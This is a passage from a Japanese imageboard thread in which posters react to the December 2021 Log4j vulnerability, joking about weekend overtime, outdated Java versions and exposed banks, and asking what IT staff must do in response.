インストールすると何億のデバイスで動いてます! って出るけどそれが全部…?
489 21/12/10(金)19:26:43 No.874968418
これ見つけてたら数年間スーパーハッカーやれた?
490 21/12/10(金)19:26:48 No.874968468
前の現場はこういうときのためにライブラリを管理する部隊がいたんだなあ…
491 21/12/10(金)19:26:51 No.874968486
>見ればわかるなんて見る人がいなけりゃ成り立たないんだ ライブラリの中身見るのなんて言われたとおりに書いてるのになぜ動かねー!って時くらいだな…
492 21/12/10(金)19:26:52 No.874968496
入力の無害化なんて基本じゃないの…?
493 21/12/10(金)19:26:57 No.874968522
うちは大丈夫でした がんばれみんな
494 21/12/10(金)19:27:12 No.874968604
>VB.NET屋さんの俺には関係ないことだな… lod4netにも最近穴見つかってるからアプデしろよな! 来週アプデ対応しないと…
495 21/12/10(金)19:27:13 No.874968606
>つまり…どういうことだってばよ? 入力欄にプログラム打ち込んだらなんでも実行できた おしまい
496 21/12/10(金)19:27:15 No.874968619
>すまない「」 >Java8 はもう新しくないんだ… そんな…まだラムダ式も覚えてないのに…
497 21/12/10(金)19:27:23 No.874968683
>Java8 はもう新しくないんだ… 嘘だ…一昨年6から8への移植作業で死んだのにどうして…
498 21/12/10(金)19:27:25 No.874968694
>ログを出すだけの能力だと思ってたら実は何でもできる能力者だった >泣きついてももう遅い! 能力を誤魔化すタイプの能力バトルやめろ
499 21/12/10(金)19:27:28 No.874968710
以前から悪用されてるケースもあったのかな
500 21/12/10(金)19:27:31 No.874968723
log4jなんて古くさいロギングフレームワーク使ってるのが悪い 今はlogbackだぜ
501 21/12/10(金)19:27:33 No.874968743
>みんな使ってるから不具合があったら俺以外が気づくだろがオープンソースだ 普通の人は調査せず悪意のある人は調査する 皮肉だよね
502 21/12/10(金)19:27:36 No.874968768
すまない… 本当にすまない…
503 21/12/10(金)19:27:38 No.874968775
>マジでプログラマー「」が土日出勤なの? >ジョークとかじゃなく? じゃば屋さんじゃなきゃセーフ!
504 21/12/10(金)19:27:49 No.874968837
>インストールすると何億のデバイスで動いてます! >って出るけどそれが全部…? 何億というデバイスが今!牙を剥く!!
505 21/12/10(金)19:27:51 No.874968851
多分古い基幹系をjavaで書いているところはヤバそうだな 特に銀行
506 21/12/10(金)19:27:53 No.874968865
やっちゃなよ!
507 21/12/10(金)19:27:56 No.874968881
>インストールすると何億のデバイスで動いてます! >って出るけどそれが全部…? log4jってライブラリ使ってるところが対象
508 21/12/10(金)19:28:21 No.874969032
じゃば屋さんじゃなくてもサーバーサイドの人たちは出勤できそうだね
509 21/12/10(金)19:28:26 No.874969054
githubでこの辺公表して対策もちゃんと教えたちゅうごくじんは もう粗方やることやり終えたからこれ流石に何とかしとかないとヤバいよしたんだろうな
510 21/12/10(金)19:28:32 No.874969085
大丈夫?休日潰れるだけで済む?
511 21/12/10(金)19:28:33 No.874969089
こういうのが発表されてすぐ確認できたり修正できる所はいいけど放置したままのがいるからいつも問題になる…
512 21/12/10(金)19:28:37 No.874969115
金融サービスや銀行がとてもヤバそうだよね まあ今まで穴あきっぱだったんだから何回かやられてそうだけど…
513 21/12/10(金)19:28:44 No.874969151
ossの脆弱性を調べることなんて早々ないからなあ
514 21/12/10(金)19:28:48 No.874969175
JavascriptはJavaじゃないから大丈夫だよ
515 21/12/10(金)19:28:51 No.874969189
こないだピクミンブルームの名前欄でタグが使える不具合あったじゃない あれの1億倍ヤバい感じ
516 21/12/10(金)19:29:04 No.874969251
log4cxxは大丈夫だろうか…
517 21/12/10(金)19:29:11 No.874969296
>多分古い基幹系をjavaで書いているところはヤバそうだな >特に銀行 銀行はたぶんガチガチにファイアウォール設定してるからたぶん大丈夫だよ そもそも基幹系でユーザー入力値を自由に受け付ける箇所がそんなにないと思う
518 21/12/10(金)19:29:17 No.874969342
javaでログ処理するならわざわざ他使う人が変態だからやべえぜ
519 21/12/10(金)19:29:26 No.874969397
うちのシステムはローカルネットだけだから大丈夫だろう 土日はこのこと忘れるとこにする
520 21/12/10(金)19:29:28 No.874969410
無知で申し訳ないんだけどこれがわかったことで情シスの人たちは何しないといけないの?アップデート対応と該当プログラムのテスト?
521 21/12/10(金)19:29:32 No.874969436
なんでもできると評判だったもんなあ…
522 21/12/10(金)19:29:35 No.874969457
>本気でこの不具合に関係がある立場の「」は今頃死にもの狂いで対応に追われてるだろうからこのスレに居るのってほぼ野次馬では? 明日から旅行行くので頼みます
523 21/12/10(金)19:29:38 No.874969474
>金融サービスや銀行がとてもヤバそうだよね >まあ今まで穴あきっぱだったんだから何回かやられてそうだけど… オンライン以外で使ってるかなぁ…今フロントエンドってC#ベースなんだよね
524 21/12/10(金)19:29:40 No.874969479
情報のお勉強し始めてる素人だけどゼロデイ攻撃が世界規模でやり放題ってやばくないですか?
525 21/12/10(金)19:29:50 No.874969558
>JavascriptはJavaじゃないから大丈夫だよ よかった☺️
526 21/12/10(金)19:29:56 No.874969587
>じゃば屋さんじゃなくてもサーバーサイドの人たちは出勤できそうだね 大きいプロジェクトだとフロントエンドも出勤になるよ!
527 21/12/10(金)19:30:01 No.874969634
ハートブリード以来だね♥️
528 21/12/10(金)19:30:04 No.874969649
>情報のお勉強し始めてる素人だけどゼロデイ攻撃が世界規模でやり放題ってやばくないですか? 無茶言うなよ
529 <a href="mailto:オラクルを崇めよ">21/12/10(金)19:30:06</a> [オラクルを崇めよ] No.874969657
オラクルを崇めよ
530 21/12/10(金)19:30:08 No.874969671
fanzaとかdlsite見ても大丈夫? まあこの2つじゃなくてもサイトになんか仕込んだりとかある?
531 21/12/10(金)19:30:23 No.874969745
>無知で申し訳ないんだけどこれがわかったことで情シスの人たちは何しないといけないの?アップデート対応と該当プログラムのテスト? こういう理由でうちは大丈夫ですっていう言い訳を考える